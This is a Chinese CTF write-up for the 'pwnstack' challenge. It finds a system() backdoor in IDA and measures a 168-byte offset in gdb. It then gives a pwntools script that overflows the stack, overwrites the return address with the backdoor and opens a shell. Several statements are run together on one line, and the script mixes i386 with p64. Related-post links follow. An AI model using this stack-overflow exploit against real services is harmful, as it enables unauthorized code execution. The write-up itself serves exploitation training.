1.pwnstack

首先用IDA进行静态分析

可以看到有一个输入函数

后门函数,直接执行system()

记下函数地址

0x400762

gdb动态分析

走到read函数的位置输入后查看栈

b8 - 10 = 168

需要输入168个字节,再用backdoor的地址覆盖main+34的返回地址即可

编写脚本

from pwn import *
context(log_level='debug',arch='i386', os='linux')
io = remote('地址', 端口)padding = 168
pause()return_addr = 0x400762
payload = b'a'* padding + p64(return_addr)
delimiter = 'that??'
io.sendlineafter(delimiter, payload)
io.interactive()

最后 cat flag

攻防世界pwn难度1相关推荐

  1. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  2. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  3. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  4. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  5. [攻防世界 pwn]——monkey

    [攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...

  6. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

  7. [攻防世界 pwn]——pwn-100

    [攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...

  8. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

  9. [攻防世界 pwn]——welpwn

    [攻防世界 pwn]--welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了.我想出来一个名词叫做栈连接 还是先checkse ...

最新文章

  1. 搭建Jasig CAS中央认证服务实现单点登录——搭建Tomcat并实现SSL安全连接
  2. SyntaxError: invalid syntax的问题原因和解决办法
  3. RDIFramework.NET ━ .NET快速信息化系统开发框架 V3.0 版新增系统参数管理
  4. HDU 6044 Limited Permutation(2017多校)【计数 快速读入挂 线性逆元】
  5. ping不通www.baidu.com,但可以访问www.baidu.com网页
  6. 【Qt】2D绘图之复合模式
  7. 20w7珠led驱动电源电路图_LED驱动电源:用TL431做的几个恒流电路分享!
  8. Mysql varchar 字节长度
  9. bootstrap-表单
  10. 【JAVA 第四章 流程控制语句】课后习题 二维坐标距离 三角形判断等
  11. 干点大事!“覆盖25万人的AI资源对接平台”发布,找人、找技术不再难!
  12. VS2013打开项目出现未找到与约束contractname 匹配的导出的错误
  13. XP安全防护国际评测 360小红伞卡巴排行前三
  14. 俄罗斯黑客太疯狂,破解赌场算法,全球捞钱……
  15. C#修改Windows系统时间
  16. html5 苹果 dock,基于JQuery模仿苹果桌面的Dock效果(初级版)
  17. 删除vlan 华为s5720_华为S5720系列交换机快速配置手册常用命令 - Late Winter
  18. 扭蛋机html源码,jQuery动画扭蛋机抽奖代码
  19. 看网易云公开课代码性能开发有感,怎样提高代码的性能
  20. echart报错echarts/lib/visual/dataColor in ./node_modules/echarts-liquidfill/src/liquidFill.js

热门文章

  1. 关于mavon-editor中iframe 的使用 和插入视频、音频的记录
  2. cURL – PUT请求示例
  3. Https比Http速度慢具体分析
  4. 学习使用solr时遇到的一些问题,记录
  5. 从零开始的命令行CLI
  6. 华为matepad11无法连接mpencil2
  7. Android自定义的下拉列表框控件
  8. 视频教程-企业微信视频教程(Java标准版)-微信开发
  9. 练习4-11 统计素数并求和(素数的函数)
  10. 金融硕士自学python_国际金融硕士跨专业学Python从老男孩教育开始